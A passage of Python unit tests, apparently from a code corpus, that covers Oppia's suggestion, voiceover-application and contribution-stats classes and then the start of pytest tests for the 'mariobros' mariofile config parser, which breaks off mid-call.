'missing_prerequisite_skill_id': None
},
'training_data': [],
'tagged_skill_misconception_id': None
}
],
'confirmed_unclassified_answers': [],
'customization_args': {
'imageAndRegions': {
'value': {
'imagePath': 'image.png',
'labeledRegions': [
{
'label': 'Region1',
'region': {
'regionType': 'Rectangle',
'area': [
[
0.2644628099173554,
0.21807065217391305
],
[
0.9201101928374655,
0.8847373188405797
]
]
}
}
]
}
},
'highlightRegionsOnHover': {
'value': False
}
},
'default_outcome': {
'dest': None,
'feedback': {
'html': '<p>wer</p>',
'content_id': 'default_outcome'
},
'labelled_as_correct': False,
'param_changes': [],
'refresher_exploration_id': None,
'missing_prerequisite_skill_id': None
},
'hints': [
{
'hint_content': {
'html': '<p>assaas</p>',
'content_id': 'hint_1'
}
}
],
'id': 'ImageClickInput', 'solution': None
},
'param_changes': [],
'recorded_voiceovers': {
'voiceovers_mapping': {
'content': {},
'default_outcome': {},
'feedback_0': {},
'hint_1': {}
}
},
'solicit_answer_details': False,
'card_is_checkpoint': False,
'written_translations': {
'translations_mapping': {
'content': {},
'default_outcome': {},
'feedback_0': {},
'hint_1': {}
}
},
'next_content_id_index': 2
}
suggestion_dict = {
'suggestion_id': 'skill1.thread1',
'suggestion_type': feconf.SUGGESTION_TYPE_ADD_QUESTION,
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': 'skill1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': question_state_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill1'],
'inapplicable_skill_misconception_ids': []
},
'skill_id': 'skill1',
'skill_difficulty': 0.3,
},
'score_category': 'question.skill1',
'language_code': 'en',
'last_updated': utils.get_time_in_millisecs(self.fake_date)
}
self.save_new_skill(
'skill1', self.author_id, description='description')
suggestion = suggestion_registry.SuggestionAddQuestion(
suggestion_dict['suggestion_id'], suggestion_dict['target_id'],
suggestion_dict['target_version_at_submission'],
suggestion_dict['status'], self.author_id, self.reviewer_id,
suggestion_dict['change'], suggestion_dict['score_category'],
suggestion_dict['language_code'], False, self.fake_date)
suggestion.accept('commit_message')
question = question_services.get_questions_by_skill_ids(
1, ['skill1'], False)[0]
destination_fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(
feconf.ENTITY_TYPE_QUESTION, question.id))
self.assertTrue(destination_fs.isfile('image/%s' % 'image.png'))
self.assertEqual(
suggestion.status,
suggestion_models.STATUS_ACCEPTED)
def test_contructor_updates_state_shema_in_change_cmd(self):
score_category = (
suggestion_models.SCORE_TYPE_QUESTION +
suggestion_models.SCORE_CATEGORY_DELIMITER + 'skill_id')
change = {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': {
'question_state_data': self.VERSION_27_STATE_DICT,
'question_state_data_schema_version': 27,
'language_code': 'en',
'linked_skill_ids': ['skill_id'],
'inapplicable_skill_misconception_ids': []
},
'skill_id': 'skill_id',
'skill_difficulty': 0.3
}
self.assertEqual(
change['question_dict']['question_state_data_schema_version'], 27)
suggestion = suggestion_registry.SuggestionAddQuestion(
'suggestionId', 'target_id', 1, suggestion_models.STATUS_IN_REVIEW,
self.author_id, None, change, score_category, 'en', False,
self.fake_date)
self.assertEqual(
suggestion.change.question_dict[
'question_state_data_schema_version'],
feconf.CURRENT_STATE_SCHEMA_VERSION)
def test_contructor_raise_exception_for_invalid_state_shema_version(self):
score_category = (
suggestion_models.SCORE_TYPE_QUESTION +
suggestion_models.SCORE_CATEGORY_DELIMITER + 'skill_id')
change = {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': {
'question_state_data': self.VERSION_27_STATE_DICT,
'question_state_data_schema_version': 23,
'language_code': 'en',
'linked_skill_ids': ['skill_id'],
'inapplicable_skill_misconception_ids': []
},
'skill_id': 'skill_id',
'skill_difficulty': 0.3
}
self.assertEqual(
change['question_dict']['question_state_data_schema_version'], 23)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected state schema version to be in between 25'
):
suggestion_registry.SuggestionAddQuestion(
'suggestionId', 'target_id', 1,
suggestion_models.STATUS_IN_REVIEW, self.author_id, None,
change, score_category, 'en', False, self.fake_date)
class MockInvalidVoiceoverApplication(
suggestion_registry.BaseVoiceoverApplication):
def __init__(self): # pylint: disable=super-init-not-called
pass
class BaseVoiceoverApplicationUnitTests(test_utils.GenericTestBase):
"""Tests for the BaseVoiceoverApplication class."""
def setUp(self):
super(BaseVoiceoverApplicationUnitTests, self).setUp()
self.base_voiceover_application = MockInvalidVoiceoverApplication()
def test_base_class_init_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseVoiceoverApplication should implement '
'__init__.'):
suggestion_registry.BaseVoiceoverApplication()
def test_base_class_accept_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseVoiceoverApplication should implement accept.'):
self.base_voiceover_application.accept()
def test_base_class_reject_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseVoiceoverApplication should implement reject.'):
self.base_voiceover_application.reject()
class ExplorationVoiceoverApplicationUnitTest(test_utils.GenericTestBase):
"""Tests for the ExplorationVoiceoverApplication class."""
def setUp(self):
super(ExplorationVoiceoverApplicationUnitTest, self).setUp()
self.signup('[email protected]', 'author')
self.author_id = self.get_user_id_from_email('[email protected]')
self.signup('[email protected]', 'reviewer')
self.reviewer_id = self.get_user_id_from_email('[email protected]')
self.voiceover_application = (
suggestion_registry.ExplorationVoiceoverApplication(
'application_id', 'exp_id', suggestion_models.STATUS_IN_REVIEW,
self.author_id, None, 'en', 'audio_file.mp3', '<p>Content</p>',
None))
def test_validation_with_invalid_target_type_raise_exception(self):
self.voiceover_application.validate()
self.voiceover_application.target_type = 'invalid_target'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected target_type to be among allowed choices, '
'received invalid_target'
):
self.voiceover_application.validate()
def test_validation_with_invalid_target_id_raise_exception(self):
self.voiceover_application.validate()
self.voiceover_application.target_id = 123
with self.assertRaisesRegex(
utils.ValidationError, 'Expected target_id to be a string'
):
self.voiceover_application.validate()
def test_validation_with_invalid_status_raise_exception(self):
self.voiceover_application.validate()
self.voiceover_application.status = 'invalid_status'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected status to be among allowed choices, '
'received invalid_status'
):
self.voiceover_application.validate()
def test_validation_with_invalid_author_id_raise_exception(self):
self.voiceover_application.validate()
self.voiceover_application.author_id = 123
with self.assertRaisesRegex(
utils.ValidationError, 'Expected author_id to be a string'
):
self.voiceover_application.validate()
def test_validation_with_invalid_final_reviewer_id_raise_exception(self):
self.assertEqual(
self.voiceover_application.status,
suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(self.voiceover_application.final_reviewer_id, None)
self.voiceover_application.validate()
self.voiceover_application.final_reviewer_id = 123
with self.assertRaisesRegex(
utils.ValidationError,
'Expected final_reviewer_id to be None as the '
'voiceover application is not yet handled.'
):
self.voiceover_application.validate()
def test_validation_for_handled_application_with_invalid_final_review(self):
self.assertEqual(
self.voiceover_application.status,
suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(self.voiceover_application.final_reviewer_id, None)
self.voiceover_application.validate()
self.voiceover_application.status = suggestion_models.STATUS_ACCEPTED
with self.assertRaisesRegex(
utils.ValidationError, 'Expected final_reviewer_id to be a string'
):
self.voiceover_application.validate()
def test_validation_for_rejected_application_with_no_message(self):
self.assertEqual(
self.voiceover_application.status,
suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(self.voiceover_application.rejection_message, None)
self.voiceover_application.validate()
self.voiceover_application.final_reviewer_id = 'reviewer_id'
self.voiceover_application.status = suggestion_models.STATUS_REJECTED
with self.assertRaisesRegex(
utils.ValidationError,
'Expected rejection_message to be a string for a '
'rejected application'
):
self.voiceover_application.validate()
def test_validation_for_accepted_application_with_message(self):
self.assertEqual(
self.voiceover_application.status,
suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(self.voiceover_application.rejection_message, None)
self.voiceover_application.validate()
self.voiceover_application.final_reviewer_id = 'reviewer_id'
self.voiceover_application.status = suggestion_models.STATUS_ACCEPTED
self.voiceover_application.rejection_message = 'Invalid message'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected rejection_message to be None for the accepted '
'voiceover application, received Invalid message'
):
self.voiceover_application.validate()
def test_validation_with_invalid_language_code_type_raise_exception(self):
self.assertEqual(self.voiceover_application.language_code, 'en')
self.voiceover_application.validate()
self.voiceover_application.language_code = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected language_code to be a string'
):
self.voiceover_application.validate()
def test_validation_with_invalid_language_code_raise_exception(self):
self.assertEqual(self.voiceover_application.language_code, 'en')
self.voiceover_application.validate()
self.voiceover_application.language_code = 'invalid language'
with self.assertRaisesRegex(
utils.ValidationError, 'Invalid language_code: invalid language'
):
self.voiceover_application.validate()
def test_validation_with_invalid_filename_type_raise_exception(self):
self.assertEqual(self.voiceover_application.filename, 'audio_file.mp3')
self.voiceover_application.validate()
self.voiceover_application.filename = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected filename to be a string'
):
self.voiceover_application.validate()
def test_validation_with_invalid_content_type_raise_exception(self):
self.assertEqual(self.voiceover_application.content, '<p>Content</p>')
self.voiceover_application.validate()
self.voiceover_application.content = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected content to be a string'
):
self.voiceover_application.validate()
def test_to_dict_returns_correct_dict(self):
self.voiceover_application.accept(self.reviewer_id)
expected_dict = {
'voiceover_application_id': 'application_id',
'target_type': 'exploration',
'target_id': 'exp_id',
'status': 'accepted',
'author_name': 'author',
'final_reviewer_name': 'reviewer',
'language_code': 'en',
'content': '<p>Content</p>',
'filename': 'audio_file.mp3',
'rejection_message': None
}
self.assertEqual(
self.voiceover_application.to_dict(), expected_dict)
def test_is_handled_property_returns_correct_value(self):
self.assertFalse(self.voiceover_application.is_handled)
self.voiceover_application.accept(self.reviewer_id)
self.assertTrue(self.voiceover_application.is_handled)
def test_accept_voiceover_application(self):
self.assertEqual(self.voiceover_application.final_reviewer_id, None)
self.assertEqual(self.voiceover_application.status, 'review')
self.voiceover_application.accept(self.reviewer_id)
self.assertEqual(
self.voiceover_application.final_reviewer_id, self.reviewer_id)
self.assertEqual(self.voiceover_application.status, 'accepted')
def test_reject_voiceover_application(self):
self.assertEqual(self.voiceover_application.final_reviewer_id, None)
self.assertEqual(self.voiceover_application.status, 'review')
self.voiceover_application.reject(self.reviewer_id, 'rejection message')
self.assertEqual(
self.voiceover_application.final_reviewer_id, self.reviewer_id)
self.assertEqual(self.voiceover_application.status, 'rejected')
self.assertEqual(
self.voiceover_application.rejection_message, 'rejection message')
class CommunityContributionStatsUnitTests(test_utils.GenericTestBase):
"""Tests for the CommunityContributionStats class."""
translation_reviewer_counts_by_lang_code = {
'hi': 0,
'en': 1
}
translation_suggestion_counts_by_lang_code = {
'fr': 6,
'en': 5
}
question_reviewer_count = 1
question_suggestion_count = 4
negative_count = -1
non_integer_count = 'non_integer_count'
sample_language_code = 'en'
invalid_language_code = 'invalid'
def _assert_community_contribution_stats_is_in_default_state(self):
"""Checks if the community contribution stats is in its default
state.
"""
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self.assertEqual(
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
), {})
self.assertEqual(
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
), {})
self.assertEqual(
community_contribution_stats.question_reviewer_count, 0)
self.assertEqual(
community_contribution_stats.question_suggestion_count, 0)
def test_initial_object_with_valid_arguments_has_correct_properties(self):
community_contribution_stats = (
suggestion_registry.CommunityContributionStats(
self.translation_reviewer_counts_by_lang_code,
self.translation_suggestion_counts_by_lang_code,
self.question_reviewer_count,
self.question_suggestion_count
)
)
community_contribution_stats.validate()
self.assertEqual(
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
),
self.translation_reviewer_counts_by_lang_code)
self.assertEqual(
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
),
self.translation_suggestion_counts_by_lang_code
)
self.assertEqual(
community_contribution_stats.question_reviewer_count,
self.question_reviewer_count
)
self.assertEqual(
community_contribution_stats.question_suggestion_count,
self.question_suggestion_count
)
def test_set_translation_reviewer_count_for_lang_code_updates_empty_dict(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
),
{self.sample_language_code: 2}
)
def test_set_translation_reviewer_count_for_lang_code_updates_count_value(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
) = {self.sample_language_code: 1}
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
),
{self.sample_language_code: 2}
)
def test_set_translation_reviewer_count_for_lang_code_adds_new_lang_key(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
) = {'en': 1}
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code('hi', 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
),
{'en': 1, 'hi': 2}
)
def test_set_translation_suggestion_count_for_lang_code_updates_empty_dict(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
), {self.sample_language_code: 2}
)
def test_set_translation_suggestion_count_for_lang_code_updates_count_value(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
) = {self.sample_language_code: 1}
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
),
{self.sample_language_code: 2}
)
def test_set_translation_suggestion_count_for_lang_code_adds_new_lang_key(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
) = {'en': 1}
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code('hi', 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
),
{'en': 1, 'hi': 2}
)
def test_get_translation_language_codes_that_need_reviewers_for_one_lang(
self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 1)
language_codes_that_need_reviewers = (
stats.get_translation_language_codes_that_need_reviewers()
)
self.assertEqual(
language_codes_that_need_reviewers, {self.sample_language_code})
def test_get_translation_language_codes_that_need_reviewers_for_multi_lang(
self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code('hi', 1)
stats.set_translation_suggestion_count_for_language_code('fr', 1)
language_codes_that_need_reviewers = (
stats.get_translation_language_codes_that_need_reviewers()
)
self.assertEqual(
language_codes_that_need_reviewers, {'hi', 'fr'})
def test_get_translation_language_codes_that_need_reviewers_for_no_lang(
self):
stats = suggestion_services.get_community_contribution_stats()
language_codes_that_need_reviewers = (
stats.get_translation_language_codes_that_need_reviewers()
)
self.assertEqual(
language_codes_that_need_reviewers, set())
def test_translation_reviewers_are_needed_if_suggestions_but_no_reviewers(
self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 1)
self.assertTrue(
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
def test_translation_reviewers_are_needed_if_num_suggestions_past_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 2)
stats.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 1)
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = (
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
self.assertTrue(reviewers_are_needed)
def test_translation_reviewers_not_needed_if_num_suggestions_eqs_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 2)
stats.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 2)
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = (
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
self.assertFalse(reviewers_are_needed)
def test_translation_reviewers_not_needed_if_num_suggestions_less_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 1)
stats.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 2)
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = (
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
self.assertFalse(reviewers_are_needed)
def test_translation_reviewers_not_needed_if_reviewers_and_no_sugestions(
self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 1)
self.assertFalse(
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
def test_translation_reviewers_not_needed_if_no_reviewers_no_sugestions(
self):
stats = suggestion_services.get_community_contribution_stats()
self._assert_community_contribution_stats_is_in_default_state()
self.assertFalse(
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
def test_question_reviewers_are_needed_if_suggestions_zero_reviewers(
self):
stats = suggestion_services.get_community_contribution_stats()
stats.question_suggestion_count = 1
self.assertTrue(stats.are_question_reviewers_needed())
def test_question_reviewers_are_needed_if_num_suggestions_past_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.question_suggestion_count = 2
stats.question_reviewer_count = 1
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = stats.are_question_reviewers_needed()
self.assertTrue(reviewers_are_needed)
def test_question_reviewers_not_needed_if_num_suggestions_eqs_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.question_suggestion_count = 2
stats.question_reviewer_count = 2
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = stats.are_question_reviewers_needed()
self.assertFalse(reviewers_are_needed)
def test_question_reviewers_not_needed_if_num_suggestions_less_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.question_suggestion_count = 1
stats.question_reviewer_count = 2
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = stats.are_question_reviewers_needed()
self.assertFalse(reviewers_are_needed)
def test_question_reviewers_not_needed_if_no_reviewers_no_sugestions(
self):
stats = suggestion_services.get_community_contribution_stats()
self._assert_community_contribution_stats_is_in_default_state()
self.assertFalse(stats.are_question_reviewers_needed())
def test_validate_translation_reviewer_counts_fails_for_negative_counts(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code(
self.sample_language_code, self.negative_count)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the translation reviewer count to be non-negative for '
'%s language code, received: %s.' % (
self.sample_language_code, self.negative_count)
):
community_contribution_stats.validate()
def test_validate_translation_suggestion_counts_fails_for_negative_counts(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code(
self.sample_language_code, self.negative_count)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the translation suggestion count to be non-negative for '
'%s language code, received: %s.' % (
self.sample_language_code, self.negative_count)
):
community_contribution_stats.validate()
def test_validate_question_reviewer_count_fails_for_negative_count(self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
community_contribution_stats.question_reviewer_count = (
self.negative_count
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the question reviewer count to be non-negative, '
'received: %s.' % (
community_contribution_stats.question_reviewer_count)
):
community_contribution_stats.validate()
def test_validate_question_suggestion_count_fails_for_negative_count(self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
community_contribution_stats.question_suggestion_count = (
self.negative_count
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the question suggestion count to be non-negative, '
'received: %s.' % (
community_contribution_stats.question_suggestion_count)
):
community_contribution_stats.validate()
def test_validate_translation_reviewer_counts_fails_for_non_integer_counts(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code(
self.sample_language_code, self.non_integer_count)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the translation reviewer count to be an integer for '
'%s language code, received: %s.' % (
self.sample_language_code, self.non_integer_count)
):
community_contribution_stats.validate()
def test_validate_translation_suggestion_counts_fails_for_non_integer_count(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code(
self.sample_language_code, self.non_integer_count)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the translation suggestion count to be an integer for '
'%s language code, received: %s.' % (
self.sample_language_code, self.non_integer_count)
):
community_contribution_stats.validate()
def test_validate_question_reviewer_count_fails_for_non_integer_count(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
community_contribution_stats.question_reviewer_count = (
self.non_integer_count
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the question reviewer count to be an integer, '
'received: %s.' % (
community_contribution_stats.question_reviewer_count)
):
community_contribution_stats.validate()
def test_validate_question_suggestion_count_fails_for_non_integer_count(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
community_contribution_stats.question_suggestion_count = (
self.non_integer_count
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the question suggestion count to be an integer, '
'received: %s.' % (
community_contribution_stats.question_suggestion_count)
):
community_contribution_stats.validate()
def test_validate_translation_reviewer_counts_fails_for_invalid_lang_code(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code(
self.invalid_language_code, 1)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Invalid language code for the translation reviewer counts: '
'%s.' % self.invalid_language_code
):
community_contribution_stats.validate()
def test_validate_translation_suggestion_counts_fails_for_invalid_lang_code(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code(
self.invalid_language_code, 1)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Invalid language code for the translation suggestion counts: '
'%s.' % self.invalid_language_code
):
community_contribution_stats.validate()
class ReviewableSuggestionEmailInfoUnitTests(test_utils.GenericTestBase):
"""Tests for the ReviewableSuggestionEmailInfo class."""
suggestion_type = feconf.SUGGESTION_TYPE_ADD_QUESTION
language_code = 'en'
suggestion_content = 'sample question'
submission_datetime = datetime.datetime.utcnow()
def test_initial_object_with_valid_arguments_has_correct_properties(self):
reviewable_suggestion_email_info = (
suggestion_registry.ReviewableSuggestionEmailInfo(
self.suggestion_type, self.language_code,
self.suggestion_content, self.submission_datetime
)
)
self.assertEqual(
reviewable_suggestion_email_info.suggestion_type,
self.suggestion_type)
self.assertEqual(
reviewable_suggestion_email_info.language_code,
self.language_code)
self.assertEqual(
reviewable_suggestion_email_info.suggestion_content,
self.suggestion_content)
self.assertEqual(
reviewable_suggestion_email_info.submission_datetime,
self.submission_datetime)
| oppia/oppia | core/domain/suggestion_registry_test.py | Python | apache-2.0 | 148,457 |
# -*- coding: utf-8 -*-
# python 2 support via python-future
from __future__ import absolute_import, division, print_function, unicode_literals
from builtins import dict
import os
import pytest
from mariobros import mariofile
SIMPLE_MARIOFILE = """[section_one]
text one
[section_two]
text two
"""
COMPLEX_MARIOFILE = """default text
[section] \ntext section
"""
GARBAGE_MARIOFILE = """default
[garbage_section] # garbage
"""
INVALID_SECTION_MARIOFILE = """
# spaces not allowed in section name
[section one]
"""
MORE_COMPLEX_MARIOFILE = """# default
[section_one]
text one
# comment
text two # inline comment
[section_two]
text three
[three]
[DEFAULT]
last"""
def test_parse_sections():
simple_mariofile_sections = dict(mariofile.parse_sections(SIMPLE_MARIOFILE.splitlines(True)))
assert len(simple_mariofile_sections) == 3
complex_mariofile_sections = dict(mariofile.parse_sections(COMPLEX_MARIOFILE.splitlines(True)))
assert len(complex_mariofile_sections) == 2
assert sorted(complex_mariofile_sections.keys()) == ['DEFAULT', 'section']
assert complex_mariofile_sections['DEFAULT'] == ['default text\n', '\n']
with pytest.raises(mariofile.ConfigurationFileError):
dict(mariofile.parse_sections(GARBAGE_MARIOFILE.splitlines(True)))
with pytest.raises(mariofile.ConfigurationFileError):
dict(mariofile.parse_sections(INVALID_SECTION_MARIOFILE.splitlines(True)))
more_complex_mariofile_sections = dict(
mariofile.parse_sections(MORE_COMPLEX_MARIOFILE.splitlines(True))
)
more_complex_mariofile_sections_keys = ['DEFAULT', 'section_one', 'section_two', 'three']
assert sorted(more_complex_mariofile_sections.keys()) == more_complex_mariofile_sections_keys
assert more_complex_mariofile_sections['three'] == []
CRASH_MARIOFILE_1 = '''
[a]
name
target:
a = 1
'''
CRASH_MARIOFILE_2 = '''
[a]
name
variable = 1
'''
def test_statements():
with pytest.raises(mariofile.ConfigurationFileError):
mariofile.parse_section_body(CRASH_MARIOFILE_1.splitlines())
with pytest.raises(mariofile.ConfigurationFileError):
mariofile.parse_section_body(CRASH_MARIOFILE_2.splitlines())
STRING_PARSE_STATEMENTS = '''
# commento
statement
statement con commento #commento
# altro commento
'''
def test_parse_statements():
parsed_statement = mariofile.parse_statements(STRING_PARSE_STATEMENTS.splitlines())
assert '\n'.join(parsed_statement) == "statement\nstatement con commento"
SECTION = """
variable = 6
target: source
task
"""
SECTION_MULTIPLE_RULE = """
target1: source1
task1
target2: source2
task2
"""
INVALID_CONFIG = """
not a definition
target: source
"""
def test_parse_section_body():
output_section = {
'action_template': ' task',
'sources_repls': 'source',
'variable': '6',
'target_pattern': 'target',
}
assert mariofile.parse_section_body(SECTION.splitlines(True)) == output_section
with pytest.raises(mariofile.ConfigurationFileError):
mariofile.parse_section_body(SECTION_MULTIPLE_RULE.splitlines(True))
with pytest.raises(mariofile.ConfigurationFileError):
mariofile.parse_section_body(INVALID_CONFIG.splitlines(True))
INCLUDE_FILE = """
include prova.ini\t
include\taltrofile.ini
variable_definition = None
[first_section]
"""
INCLUDE_UNIQUE_FILE = "include prova.ini"
def test_parse_include():
filepaths, current_line = mariofile.parse_include(INCLUDE_FILE.splitlines(True))
assert filepaths == ['prova.ini', 'altrofile.ini']
assert current_line == 4
filepaths, current_line = mariofile.parse_include(INCLUDE_UNIQUE_FILE.splitlines(True))
assert filepaths == ['prova.ini']
assert current_line == 1
MARIOFILE = """[DEFAULT]
variable = 1
[section_one]
target1: source1
task1
"""
MARIOFILE_AND_INCLUDE = """
include test_parse_config.ini
[section_include_1]
"""
MARIOFILE_INCLUDE = """
task_cmd = task_command
[section_include]
variable_include_2 = 0
target_include: source_include
\t${task_cmd}
[section_include_1]
variable_include_3 = 3
"""
TOUCH_MARIOFILE = """
DEFAULT:
touch
[task]
target: source
task
"""
TEST_PARSE_CONFIG = """
include test_include.ini
variable_default = 1
[section_main]
[section_include_1]
variable_include1 = 3
"""
def test_parse_config(tmpdir):
parsed_mariofile = {
'DEFAULT': {
'action_template': '',
'sources_repls': '',
'target_pattern': '',
'variable': '1'
},
'section_one': {
'action_template': ' task1',
'sources_repls': 'source1',
'target_pattern': 'target1'}
}
mariofile.parse_config(MARIOFILE.splitlines(True)) == parsed_mariofile
parsed_mariofile_include_test = {
'DEFAULT': {
'action_template': '',
'sources_repls': '',
'target_pattern': '',
'task_cmd': 'task_command',
},
'section_include': {
'variable_include_2': '0',
'action_template': '\t${task_cmd}',
'target_pattern': 'target_include',
'sources_repls': 'source_include',
},
'section_include_1': {
'action_template': '',
'sources_repls': '',
'target_pattern': '',
'variable_include_3': '3',
}
}
mario_folder = tmpdir.mkdir('tmpdir')
f = mario_folder.join('test_parse_config.ini')
f.write(MARIOFILE_INCLUDE)
g = mario_folder.join('test_include.ini')
g.write('')
mario_folder.chdir()
parsed_mariofile_include = mariofile.parse_config(
MARIOFILE_AND_INCLUDE.splitlines(True),
cwd=os.path.join(str(mario_folder.dirname), 'tmpdir')
)
for key, value in parsed_mariofile_include.items():
assert value == parsed_mariofile_include_test[key], print(key)
parsed_mariofile_multiple_include = {
'DEFAULT': {
'action_template': '',
'sources_repls': '',
'target_pattern': '',
'variable_default': '1',
},
'section_main': {
'action_template': u'',
'sources_repls': u'',
'target_pattern': u''
},
'section_include_1': {
'action_template': '',
'sources_repls': '',
'target_pattern': '',
'variable_include1': '3',
}
}
h = mario_folder.join('test_parse_config.ini')
h.write(TEST_PARSE_CONFIG)
parsed_mariofile_include = mariofile.parse_config(MARIOFILE_AND_INCLUDE.splitlines(True),
